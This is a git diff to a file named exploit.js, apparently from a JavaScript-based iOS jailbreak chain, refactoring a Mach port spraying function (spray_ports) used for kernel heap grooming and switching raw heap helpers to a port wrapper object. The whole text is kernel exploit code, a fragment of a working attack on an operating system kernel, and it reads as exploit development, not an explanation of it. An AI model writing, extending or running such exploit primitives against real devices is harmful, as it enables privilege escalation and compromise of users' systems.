yahtzee

1 files changed, 10 insertions, 15 deletions

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 68ed794..c72963c 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -203,28 +203,23 @@ function spray(dict, size, port) {
 var kp = 0;
 function spray_ports(number_port_descs) {
 	if (kp == 0) {
-		kp = shit_heap(4);
-		mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
-		mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
-	} else if (read_u32(kp) == 0) {
-		kp = shit_heap(4);
-		mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
-		mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+		kp = new mach_port_t();
+		mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp.addy);
+		mach_port_insert_right(task_self, kp.deref(), kp.deref(), MACH_MSG_TYPE_MAKE_SEND);
 	}
 
-	var mp = shit_heap(4);
+	var mp = new mach_port_t();
 
-	var ret_ = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
-//	p0laris_log("mpa %d (%s)\n", ret_, mach_error_string(ret_));
-	ret_ = mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
-//	p0laris_log("mpir %d (%s)\n", ret_, mach_error_string(ret_));
+	var ret_ = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp.addy);
+	p0laris_log("mpa %d (%s)\n", ret_, mach_error_string(ret_));
+	ret_ = mach_port_insert_right(task_self, mp.deref(), mp.deref(), MACH_MSG_TYPE_MAKE_SEND);
+	p0laris_log("mpir %d (%s)\n", ret_, mach_error_string(ret_));
 
-	ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+	ret_ = send_ports(mp.deref(), kp.deref(), 2, number_port_descs);
 
 	p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
 
-	var ret = read_u32(mp);
-	shit_heap_free(mp);
+	var ret = mp.deref();
 	return ret;
 }